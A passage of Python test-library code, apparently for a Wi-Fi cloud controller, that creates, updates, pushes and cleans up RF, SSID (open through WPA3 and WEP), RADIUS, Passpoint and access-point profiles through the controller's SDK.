"ap": [],
"radius": [],
"rf": [],
"passpoint_osu_id_provider": [],
"passpoint_operator": [],
"passpoint_venue": [],
"passpoint": []
}
self.profile_name_with_id = {}
self.default_profiles = {}
self.profile_ids = []
def cleanup_objects(self):
self.sdk_client.refresh_instance()
self.profile_creation_ids = {
"ssid": [],
"ap": [],
"radius": [],
"rf": [],
"passpoint_osu_id_provider": [],
"passpoint_operator": [],
"passpoint_venue": [],
"passpoint": []
}
self.profile_name_with_id = {}
self.default_profiles = {}
self.profile_ids = []
def get_profile_by_name(self, profile_name=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 1000
}"""
profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in profiles._items:
if i._name == profile_name:
return i
return None
def get_ssid_name_by_profile_id(self, profile_id=None):
self.sdk_client.refresh_instance()
profiles = self.profile_client.get_profile_by_id(profile_id=profile_id)
return profiles._details["ssid"]
"""
default templates are as follows :
profile_name= TipWlan-rf/
Radius-Profile/
TipWlan-2-Radios/
TipWlan-3-Radios/
TipWlan-Cloud-Wifi/
Captive-Portal
"""
def get_default_profiles(self):
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 100
}"""
self.sdk_client.refresh_instance()
items = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in items._items:
# print(i._name, i._id)
if i._name == "TipWlan-Cloud-Wifi":
self.default_profiles['ssid'] = i
if i._name == "TipWlan-3-Radios":
self.default_profiles['equipment_ap_3_radios'] = i
if i._name == "TipWlan-2-Radios":
self.default_profiles['equipment_ap_2_radios'] = i
if i._name == "Captive-Portal":
self.default_profiles['captive_portal'] = i
if i._name == "Radius-Profile":
self.default_profiles['radius'] = i
if i._name == "TipWlan-rf":
self.default_profiles['rf'] = i
# print(i)
# This will delete the Profiles associated with an equipment of givwn equipment_id, and associate it to default
# equipment_ap profile
def delete_current_profile(self, equipment_id=None):
self.sdk_client.refresh_instance()
equipment_data = self.sdk_client.equipment_client.get_equipment_by_id(equipment_id=equipment_id)
data = self.profile_client.get_profile_with_children(profile_id=equipment_data._profile_id)
delete_ids = []
for i in data:
if i._name == "TipWlan-rf":
continue
else:
delete_ids.append(i._id)
# print(delete_ids)
self.get_default_profiles()
self.profile_creation_ids['ap'] = self.default_profiles['equipment_ap_3_radios']._id
# print(self.profile_creation_ids)
self.push_profile_old_method(equipment_id=equipment_id)
self.delete_profile(profile_id=delete_ids)
# This will delete all the profiles on an controller instance, except the default profiles
def cleanup_profiles(self):
self.sdk_client.refresh_instance()
try:
self.get_default_profiles()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 10000
}"""
skip_delete_id = []
for i in self.default_profiles:
skip_delete_id.append(self.default_profiles[i]._id)
all_profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
delete_ids = []
for i in all_profiles._items:
delete_ids.append(i._id)
skip_delete_id = []
for i in self.default_profiles:
skip_delete_id.append(self.default_profiles[i]._id)
delete_ids = list(set(delete_ids) - set(delete_ids).intersection(set(skip_delete_id)))
print(delete_ids)
for i in delete_ids:
self.set_equipment_to_profile(profile_id=i)
self.delete_profile(profile_id=delete_ids)
status = True
except Exception as e:
print(e)
status = False
return status
# Delete any profile with the given name
def delete_profile_by_name(self, profile_name=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 5000
}"""
all_profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in all_profiles._items:
if i._name == profile_name:
counts = self.profile_client.get_counts_of_equipment_that_use_profiles([i._id])[0]
if counts._value2:
self.set_equipment_to_profile(profile_id=i._id)
self.delete_profile(profile_id=[i._id])
else:
self.delete_profile(profile_id=[i._id])
# This method will set all the equipments to default equipment_ap profile, those having the profile_id passed in
# argument
def set_equipment_to_profile(self, profile_id=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 5000
}"""
equipment_data = self.sdk_client.equipment_client. \
get_equipment_by_customer_id(customer_id=2,
pagination_context=pagination_context)
self.get_default_profiles()
for i in equipment_data._items:
if i._profile_id == profile_id:
self.profile_creation_ids['ap'] = self.default_profiles['equipment_ap_2_radios']._id
self.push_profile_old_method(equipment_id=i._id)
time.sleep(2)
"""
method call: used to create the rf profile and push set the parameters accordingly and update
Library method to create a new rf profile: Now using default profile
"""
def set_rf_profile(self, profile_data=None, mode=None):
self.sdk_client.refresh_instance()
self.get_default_profiles()
if mode == "wifi5":
default_profile = self.default_profiles['rf']
default_profile._name = profile_data["name"]
default_profile._details["rfConfigMap"]["is2dot4GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzL"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzU"]["rf"] = profile_data["name"]
for i in default_profile._details["rfConfigMap"]:
for j in profile_data:
if i == j:
for k in default_profile._details["rfConfigMap"][i]:
for l in profile_data[j]:
if l == k:
default_profile._details["rfConfigMap"][i][l] = profile_data[j][l]
profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['rf'].append(profile._id)
return profile
if mode == "wifi6":
default_profile = self.default_profiles['rf']
default_profile._name = profile_data["name"]
default_profile._details["rfConfigMap"]["is2dot4GHz"]["activeScanSettings"]["enabled"] = False
default_profile._details["rfConfigMap"]["is2dot4GHz"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is5GHz"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is5GHzL"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is5GHzU"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is2dot4GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzL"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzU"]["rf"] = profile_data["name"]
default_profile._name = profile_data["name"]
for i in default_profile._details["rfConfigMap"]:
for j in profile_data:
if i == j:
for k in default_profile._details["rfConfigMap"][i]:
for l in profile_data[j]:
if l == k:
default_profile._details["rfConfigMap"][i][l] = profile_data[j][l]
profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['rf'].append(profile._id)
return profile
"""
method call: used to create a ssid profile with the given parameters
"""
# Open
def create_open_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'open'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
self.profile_name_with_id[profile_data["ssid_name"]] = profile_id
except Exception as e:
print(e)
profile = "error"
return profile
# wpa personal
def create_wpa_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
self.get_default_profiles()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpaPSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa2 personal
def create_wpa2_personal_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa2OnlyPSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 personal
def create_wpa3_personal_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa3OnlySAE'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 personal mixed mode
def create_wpa3_personal_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa3MixedSAE'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa wpa2 personal mixed mode
def create_wpa_wpa2_personal_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['keyStr'] = profile_data['security_key']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wpa2PSK'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa enterprise done
def create_wpa_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpaRadius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa wpa2 enterprise mixed mode done
def create_wpa_wpa2_enterprise_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa2Radius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa2 enterprise mode ssid profile
def create_wpa2_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa2OnlyRadius'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mode
def create_wpa3_enterprise_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa3OnlyEAP'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mixed mode done
def create_wpa3_enterprise_mixed_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details['secureMode'] = 'wpa3MixedEAP'
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# wpa3 enterprise mixed mode done
def create_wep_ssid_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
try:
if profile_data is None:
return False
default_profile = self.default_profiles['ssid']
default_profile._details['appliedRadios'] = profile_data["appliedRadios"]
default_profile._name = profile_data['profile_name']
default_profile._details['vlanId'] = profile_data['vlan']
default_profile._details['ssid'] = profile_data['ssid_name']
default_profile._details['forwardMode'] = profile_data['mode']
default_profile._details['secureMode'] = 'wep'
default_profile._details['wepConfig'] = {}
default_profile._details['wepConfig']["model_type"] = "WepConfiguration"
default_profile._details['wepConfig']["wepAuthType"] = "open"
default_profile._details['wepConfig']["primaryTxKeyId"] = profile_data["default_key_id"]
default_profile._details['wepConfig']["wepKeys"] = [{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'},
{'model_type': 'WepKey',
'txKey': profile_data["wep_key"],
'txKeyConverted': None,
'txKeyType': 'wep64'}]
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids['ssid'].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
def __get_boolean(self, flag):
return 'true' if flag in ["Enabled", "True"] else 'false'
# wpa eap general method
def __create_wpa_eap_passpoint_ssid_profiles(self, profile_data=None, secure_mode=None):
try:
if profile_data is None or secure_mode is None:
return False
default_profile = self.default_profiles["ssid"]
default_profile._details["appliedRadios"] = profile_data["appliedRadios"]
default_profile._name = profile_data["profile_name"]
default_profile._details["vlanId"] = profile_data["vlan"]
default_profile._details["ssid"] = profile_data["ssid_name"]
default_profile._details["forwardMode"] = profile_data["mode"]
default_profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
default_profile._child_profile_ids = self.profile_creation_ids["radius"]
default_profile._details["secureMode"] = secure_mode
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["ssid"].append(profile_id)
self.profile_ids.append(profile_id)
self.profile_name_with_id[profile_data["ssid_name"]] = profile_id
except Exception as e:
print(e)
profile = False
return profile
# wpa eap passpoint
def create_wpa_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpaEAP")
# wpa2 eap passpoint
def create_wpa2_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpa2EAP")
# wpa2only eap passpoint
def create_wpa2_only_eap_passpoint_ssid_profile(self, profile_data=None):
if profile_data is None:
return False
return self.__create_wpa_eap_passpoint_ssid_profiles(profile_data, "wpa2OnlyEAP")
# passpoint osu id provider profile
def create_passpoint_osu_id_provider_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_osu_id_provider"
default_profile["name"] = profile_data["profile_name"]
details = dict()
details["model_type"] = "PasspointOsuProviderProfile"
mcc_mnc = dict()
if (profile_data["mcc"] and profile_data["mnc"]) is not None:
mcc_mnc = {"mcc": profile_data["mcc"], "mnc": profile_data["mnc"]}
if profile_data["network"] is not None:
mcc_mnc["network"] = profile_data["network"]
if mcc_mnc:
details["mccMncList"] = [mcc_mnc]
if (profile_data["mcc"] and profile_data["mnc"]) is not None:
details["mccMncList"] = [{"mcc": profile_data["mcc"], "mnc": profile_data["mnc"]}]
if profile_data["osu_nai_standalone"] is not None:
details["osuNaiStandalone"] = profile_data["osu_nai_standalone"]
if profile_data["osu_nai_shared"] is not None:
details["osuNaiShared"] = profile_data["osu_nai_shared"]
if profile_data["nai_realms"] is not None:
details["naiRealmList"] = [{"naiRealms": [profile_data["nai_realms"]["domain"]],
"encoding": profile_data["nai_realms"]["encoding"],
"eapMap": profile_data["nai_realms"]["eap_map"]
}]
details["roamingOi"] = profile_data["roaming_oi"]
default_profile['details'] = details
default_profile['childProfileIds'] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_osu_id_provider"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# passpoint operator profile
def create_passpoint_operator_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_operator"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointOperatorProfile"
default_profile["details"]["serverOnlyAuthenticatedL2EncryptionNetwork"] = \
self.__get_boolean(profile_data["osen"])
operator_names = []
operators = profile_data["operator_names"]
for operator in profile_data["operator_names"]:
operator_temp = dict()
for key in operator.keys():
if key == "name":
operator_temp["dupleName"] = operator["name"]
else:
operator_temp[key] = operator[key]
operator_names.append(operator_temp)
default_profile["details"]["operatorFriendlyName"] = operator_names
default_profile["details"]["domainNameList"] = profile_data["domain_name_list"]
default_profile["childProfileIds"] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_operator"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
profile = False
return profile
# passpoint venue profile
def create_passpoint_venue_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint_venue"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointVenueProfile"
venue_names = []
for venue in profile_data["venue_names"]:
venue_temp = dict()
for key in venue.keys():
if key == "name":
venue_temp["dupleName"] = venue["name"]
if key == "url":
venue_temp["venueUrl"] = venue["url"]
venue_names.append(venue_temp)
default_profile["details"]["venueNameSet"] = venue_names
allowed_venue_groups = {"Unspecified": 0, "Assembly": 1, "Business": 2, "Educational": 3,
"Factory and Industrial": 4, "Institutional": 5, "Mercantile": 6, "Residential": 7}
allowed_venue_types = {"Unspecified Assembly": 0, "Areana": 1, "Stadium": 2, "Passenger Terminal": 3,
"Amphitheatre": 4, "Amusement Park": 5, "Place of Worship": 6,
"Convention Center": 7,
"Library": 8, "Museum": 9, "Restaurant": 10, "Theatre": 11, "Bar": 12,
"Coffee Shop": 13,
"Zoo or Aquarium": 14, "Emergency Coordination Center": 15,
"Unspecified Business": 0, "Doctor or Dentist office": 1, "Bank": 2,
"Fire Station": 3,
"Police Station": 4, "Post Office": 5, "Professional Office": 6,
"Research and Development Facility": 7, "Attorney Office": 8,
"Unspecified Educational": 0, "School, Primary": 1, "School, Secondary": 2,
"University or College": 3, "Unspecified Factory and Industrial": 0, "Factory": 1,
"Unspecified Institutional": 0, "Hospital": 1, "Long-Term Care Facility": 2,
"Alcohol and Drug Re-habilitation Center": 3, "Group Home": 4, "Prison or Jail": 5,
"Unspecified Mercantile": 0, "Retail Store": 1, "Grocery Market": 2,
"Automotive Service Station": 3, "Shopping Mall": 4, "Gas Station": 5,
"Unspecified Residential": 0, "Pivate Residence": 1, "Hotel or Model": 2,
"Dormitory": 3, "Boarding House": 4}
default_profile["details"]["venueTypeAssignment"] = {"venueGroupId":
allowed_venue_groups[
profile_data["venue_type"]["group"]],
"venueTypeId":
allowed_venue_types[
profile_data["venue_type"]["type"]]}
default_profile["childProfileIds"] = []
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint_venue"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
# passpoint profile
def create_passpoint_profile(self, profile_data=None):
try:
if profile_data is None:
return False
default_profile = dict()
default_profile["model_type"] = "Profile"
default_profile["customerId"] = self.sdk_client.customer_id
default_profile["profileType"] = "passpoint"
default_profile["name"] = profile_data["profile_name"]
default_profile["details"] = dict()
default_profile["details"]["model_type"] = "PasspointProfile"
default_profile["details"]["enableInterworkingAndHs20"] = self.__get_boolean(
profile_data["interworking_hs2dot0"])
if profile_data["hessid"] is not None:
default_profile["details"]["hessid"] = dict()
default_profile["details"]["hessid"]["addressAsString"] = profile_data["hessid"]
default_profile["details"]["passpointAccessNetworkType"] = \
profile_data["access_network"]["Access Network Type"].replace(' ', '_').lower()
default_profile["details"]["passpointNetworkAuthenticationType"] = \
profile_data["access_network"]["Authentication Type"].replace('&', 'and').replace(' ', '_').lower()
default_profile["details"]["emergencyServicesReachable"] = self.__get_boolean(
profile_data["access_network"][
"Emergency Services Reachable"])
default_profile["details"]["unauthenticatedEmergencyServiceAccessible"] = self.__get_boolean(
profile_data["access_network"][
"Unauthenticated Emergency Service"])
default_profile["details"]["internetConnectivity"] = self.__get_boolean(profile_data["ip_connectivity"][
"Internet Connectivity"])
capability_set = []
for cap in profile_data["ip_connectivity"]["Connection Capability"]:
capability_info = dict()
capability_info["connectionCapabilitiesPortNumber"] = cap["port"]
capability_info["connectionCapabilitiesIpProtocol"] = cap["protocol"]
capability_info["connectionCapabilitiesStatus"] = cap["status"]
capability_set.append(capability_info)
default_profile["details"]["connectionCapabilitySet"] = capability_set
default_profile["details"]["ipAddressTypeAvailability"] = profile_data["ip_connectivity"]["IP Address Type"]
allowed_gas_address_behavior = {"P2P Spec Workaround From Request": "p2pSpecWorkaroundFromRequest",
"forceNonCompliantBehaviourFromRequest": "forceNonCompliantBehaviourFromRequest",
"IEEE 80211 Standard Compliant Only": "ieee80211StandardCompliantOnly"}
default_profile["details"]["gasAddr3Behaviour"] = allowed_gas_address_behavior[
profile_data["ip_connectivity"]
["GAS Address 3 Behaviour"]]
default_profile["details"]["anqpDomainId"] = profile_data["ip_connectivity"]["ANQP Domain ID"]
default_profile["details"]["disableDownstreamGroupAddressedForwarding"] = self.__get_boolean(
profile_data["ip_connectivity"][
"Disable DGAF"])
default_profile["details"]["associatedAccessSsidProfileIds"] = profile_data["allowed_ssids"]
default_profile["details"]["passpointOperatorProfileId"] = self.profile_creation_ids["passpoint_operator"][0]
default_profile["details"]["passpointVenueProfileId"] = self.profile_creation_ids["passpoint_venue"][0]
default_profile["details"]["passpointOsuProviderProfileIds"] = self.profile_creation_ids[
"passpoint_osu_id_provider"]
default_profile["details"]["accessNetworkType"] = \
profile_data["access_network"]["Access Network Type"].replace(' ', '_').lower()
# osuSsidProfileId is needed for R2
default_profile["details"]["networkAuthenticationType"] = \
profile_data["access_network"]["Authentication Type"].replace('&', 'and').replace(' ', '_').lower()
default_profile["childProfileIds"] = self.profile_creation_ids["passpoint_venue"] + \
self.profile_creation_ids["passpoint_operator"] + \
self.profile_creation_ids["passpoint_osu_id_provider"]
profile = self.profile_client.create_profile(body=default_profile)
profile_id = profile._id
self.profile_creation_ids["passpoint"].append(profile_id)
self.profile_ids.append(profile_id)
except Exception as e:
print(e)
profile = False
return profile
"""
method call: used to create a ap profile that contains the given ssid profiles
"""
def set_ap_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
return False
default_profile = self.default_profiles['equipment_ap_2_radios']
default_profile._child_profile_ids = []
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius"]:
for j in self.profile_creation_ids[i]:
default_profile._child_profile_ids.append(j)
default_profile._name = profile_data['profile_name']
# print(default_profile)
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['ap'] = default_profile._id
self.profile_ids.append(default_profile._id)
return default_profile
"""
method call: used to create a ap profile that contains the given ssid profiles
"""
def set_ap_profile_custom(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
return False
default_profile = self.default_profiles['equipment_ap_2_radios']
default_profile._child_profile_ids = []
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius", "ssid"]:
for j in self.profile_creation_ids[i]:
default_profile._child_profile_ids.append(j)
for ssid in profile_data["ssid_names"]:
default_profile._child_profile_ids.append(self.profile_name_with_id[ssid])
default_profile._name = profile_data['profile_name']
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['ap'] = default_profile._id
self.profile_ids.append(default_profile._id)
return default_profile
"""
method call: used to create a ap profile that contains the specific ssid profiles
"""
def update_ap_profile(self, profile_data=None):
self.sdk_client.refresh_instance()
if profile_data is None:
print("profile info is None, Please specify the profile info that you want to update")
return False
child_profiles_to_apply = []
try:
for ssid in profile_data["ssid_names"]:
child_profiles_to_apply.append(self.profile_name_with_id[ssid])
default_profile = self.get_profile_by_name(profile_name=profile_data["profile_name"])
for i in self.profile_creation_ids:
if i not in ["ap", "passpoint_osu_id_provider", "passpoint_operator", "passpoint_venue", "passpoint",
"radius", "ssid"]:
for j in self.profile_creation_ids[i]:
child_profiles_to_apply.append(j)
default_profile._child_profile_ids = child_profiles_to_apply
default_profile = self.profile_client.update_profile(default_profile)
return True
except Exception as e:
print(e)
return False
"""
method call: used to create a radius profile with the settings given
"""
def create_radius_profile(self, radius_info=None, radius_accounting_info=None):
self.sdk_client.refresh_instance()
default_profile = self.default_profiles['radius']
default_profile._name = radius_info['name']
default_profile._details['primaryRadiusAuthServer'] = {}
default_profile._details['primaryRadiusAuthServer']['ipAddress'] = radius_info['ip']
default_profile._details['primaryRadiusAuthServer']['port'] = radius_info['port']
default_profile._details['primaryRadiusAuthServer']['secret'] = radius_info['secret']
if radius_accounting_info is not None:
default_profile._details["primaryRadiusAccountingServer"] = {}
default_profile._details["primaryRadiusAccountingServer"]["ipAddress"] = radius_accounting_info["ip"]
default_profile._details["primaryRadiusAccountingServer"]["port"] = radius_accounting_info["port"]
default_profile._details["primaryRadiusAccountingServer"]["secret"] = radius_accounting_info["secret"]
default_profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['radius'] = [default_profile._id]
self.profile_ids.append(default_profile._id)
return default_profile
"""
method to push the profile to the given equipment
"""
# Under a Bug, depreciated until resolved, should be used primarily
def push_profile(self, equipment_id=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 100
}"""
default_equipment_data = self.sdk_client.equipment_client.get_equipment_by_id(equipment_id=11, async_req=False)
# default_equipment_data._details[] = self.profile_creation_ids['ap']
# print(default_equipment_data)
# print(self.sdk_client.equipment_client.update_equipment(body=default_equipment_data, async_req=True))
"""
method to verify if the expected ssid's are loaded in the ap vif config
"""
def update_ssid_name(self, profile_name=None, new_profile_name=None):
self.sdk_client.refresh_instance()
if profile_name is None:
print("profile name is None, Please specify the ssid profile name that you want to modify")
return False
if new_profile_name is None:
